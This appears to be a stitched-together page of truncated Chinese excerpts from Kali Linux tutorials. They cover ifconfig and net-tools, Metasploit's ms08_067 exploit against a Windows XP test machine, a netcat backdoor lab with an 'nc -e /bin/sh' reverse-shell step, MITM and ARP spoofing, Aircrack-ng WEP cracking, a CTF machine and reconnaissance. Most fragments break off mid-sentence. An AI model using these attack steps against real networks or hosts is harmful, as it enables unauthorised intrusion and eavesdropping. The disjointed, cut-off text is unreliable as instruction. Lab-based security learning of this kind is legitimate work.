1 概述 ifconfig工具不仅可以被用来简单地获取网络接口配置信息,还可以修改这些配置.用ifconfig命令配置的网卡信息,在网卡重启后机器重启后,配置就不存在.要想将上述的配置信息永远的存的电脑里,那就要修改网卡的配置文件了. 2 命令详解 2.1 命令常见参数 Usage: ifconfig [-a] [-v] [-s] <interface> [[<AF>] <address>][add <address>[/<prefixlen>]

原理分析:http://www.freebuf.com/articles/77055.html 转官方说明:https://www.offensive-security.com/metasploit-unleashed/karmetasploit-configuration/ There is a bit of setup required to get Karmetasploit up and going. The first step is to obtain the run control

我使用Kali Linux的IP地址是192.168.0.112:在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑. 本文演示怎么使用Metasploit入侵windows xp sp3. 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great. 查看某个漏洞的详细信

1.用vim打开 /etc/apt/source.list root@kali:~# vim /etc/apt/sources.list #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun

环境准备:  方式一(选择该方式):Kali Linux.笔记本一台.U盘(至少8G)  方式二:Kali Linux.外置网卡.笔记本一台.VM   特别说明,主要是使用方式一进行破解,如果有外置网卡,那就非常简单了,直接通过vm外接网卡即可.   注:制作kali启动镜像前,U盘里的数据一定要备份.备份.备份. 1.balenaEtcher安装 该软件是用来制作镜像的工具,也可以使用其它的.不过不推荐,试过其它几款,还不如这个一键制作好用. 2.制作kali启动镜像 等待3-5分钟.注:在制

Exp2 后门原理与实践 任务一:使用netcat获取主机操作Shell,cron启动 1.windows获取linux shell 1.1 ipconfig  查看本机查看以太网适配器(8)的ipv4地址 1.2windows:  ncat.exe -l -p   调用ncat.exe程序来蹲守本机的4325端口 1.3  nc –e /bin/sh  在Kali环境下,使用nc指令的-e参数反向连接Windows主机的4325端口: 2.linux获得windows shell 2.1 Ka

中间人攻击(MITM)该攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持.DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银.网游.网上交易等最有威胁并且最具破坏性的一种攻击方式. 主机列表 IP地址 网关地址 主机作用 Windows 10 192.168.1.2/24 192.168.1.1 被害主机 Kali Linux 19

大部分的命令可以正常的运行在BackTrack5或Kali上.在Kali上可以实现的无线渗透测试,在树莓派上也可以运行.在第1章中介绍了在树莓派上安装Kali Linux操作系统,下面将介绍在树莓派上实现无线攻击. (1)在树莓派上使用ifconfig命令查看无线网卡是否被识别.执行命令如下所示: root@kali:~# ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:7a:59:75 inet addr:192.168.0.112 Bcas

Aircrack-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具.该工具主要用了两种攻击方式进行WEP破解.一种是FMS攻击,该攻击方式是以发现该WEP漏洞的研究人员名字(Scott Fluhrer.Itsik Mantin及Adi Shamir)所命名:另一种是Korek攻击,该攻击方式是通过统计进行攻击的,并且该攻击的效率要远高于FMS攻击.本节将介绍使用Aircrack-ng破解无线网络. 9.2.1 破解WEP加密的无线网络 Wired Equivalent P

About djinn: 1 描述 难度级别:中等 Flag:user.txt和root.txt 说明:该计算机是VirtualBox以及VMWare兼容的.DHCP将自动分配IP.您将在登录屏幕上看到该IP地址.您必须找到并读取分别在user.txt和root.txt中存在的两个Flag(user和root) 格式:虚拟机(Virtualbox-OVA) 操作系统:Linux 屏幕截图 下载地址 djinn.ova (Size: 1.9 GB) Download: https://drive.

kali无法使用ifconfig apt-get -y install net-tools

Kali Linux缺少ifconfig命令   ifconfig是配置和查看网络的基础命令.在某些Kali Linux版本中,可能会缺少ifconfig命令.这个时候,用户需要手动安装该命令.该命令隶属于net-tools软件包.所以,用户需要安装该软件包.命令如下:   apt-get install net-tools

ifconfig命令 1.ifconfig执行页面 root@localhost:/home/zys# ifconfig lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 0 (Local Loopback) RX packets 1398633 bytes 21

1.安装net-tools,因ifconfig属于net-tools,输入命令:   sudo apt-get install net-tools 记住加上sudo哦!4647c21ef50df33a5fbd5c2294324d7f.png  2.添加环境变量:export PATH=$PATH:/sbin 1501769919f83bbf7effd50ecb815156.png 3.现在试试,记住加上sudo哦,或者打开终端后先执行:sudo su我们试试:sudo ifconfig4fa7e

解决方法: 执行命令:dhclient -v,即可解决

无线破解是进行无线渗透的第一步.破解无线目前只有两种方法:抓包.跑pin. 破解无线方法一:抓包.我是在kali linux下进行的. 将无线网卡的模式调为监听模式. airmon-ng start wlan0 若网卡因为开机自动连上了已知密码的wifi,你需要先把网卡down掉,然后调模式,如下命令: ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up 查看周围可用wifi以及wifi的信号,信号交换频率,信号是在

kali实战笔记 17:55 2016/7/19 by: _Silvers kali系统安装后的配置及美化安装vmwareToolstar zxvf VMwareTools-sfsfsfasfasfsaf #解压安装包cd 到解压后的安装目录 ./ 绿色的可执行文件 #进行安装# 等待安装结束,期间根据提示进行y/n确定reboot # 重启kalikali系统更新及替换国内软件源leafpad /etc/apt/sources.list注释掉官方的更新源复制国内的更新源 #可百度国内更新源地址

关于ARP攻击的原理以及在Kali Linux环境下的实现 全文摘要 本文讲述内容分为两部分,前半部分讲述ARP协议及ARP攻击原理,后半部分讲述在Kali Linux环境下如何实现ARP攻击以及ARP欺骗,如果对于ARP攻击的背景和原理不感兴趣的话可以直接翻到下面查看操作方法 ARP协议 基本功能 局限性 攻击原理 Kali Linux下的实现 ARP攻击 ARP欺骗 ARP协议 ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络

原文地址: http://netsecurity.51cto.com/art/201303/386031.htm http://xiao106347.blog.163.com/blog/static/215992078201352055231824/ http://www.cnsecer.com/1725.html http://www.tiaotiaolong.net/2015/07/17/kali%E5%AE%9E%E7%8E%B0%E5%B1%80%E5%9F%9F%E7%BD%91arp

手动漏洞挖掘 即扫描后,如何对发现的漏洞告警进行验证. #默认安装 流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行. 漏洞类型--远程命令执行 1.phpMyadmin 安装在web服务器中的web接口,专门用来管理MySQL数据库.对于早期版本,安装后若是没有做安全配置,对敏感路径进行删除,则有可能留下安全隐患,其中最明显的为setup. a.探索PHP网站(可根据b

主动信息收集 被动信息收集可能不准确,可以用主动信息收集验证   特点:直接与目标系统交互通信,无法避免留下访问痕迹 解决方法:1.使用受控的第三方电脑进行探测,使用代理 (做好被封杀的准备)   2.伪造大量的来源IP进行探测,进行噪声迷惑,淹没真是的探测流量   扫描流程:发送不同的探测,根据返回结果判断目标状态[IP层->端口层->服务层]   发现 识别活着的主机,发现潜在的被攻击目标,输出结果为IP地址列表.   二层发现 数据电路层,使用ARP协议 使用场景:已经取得一台主机,进入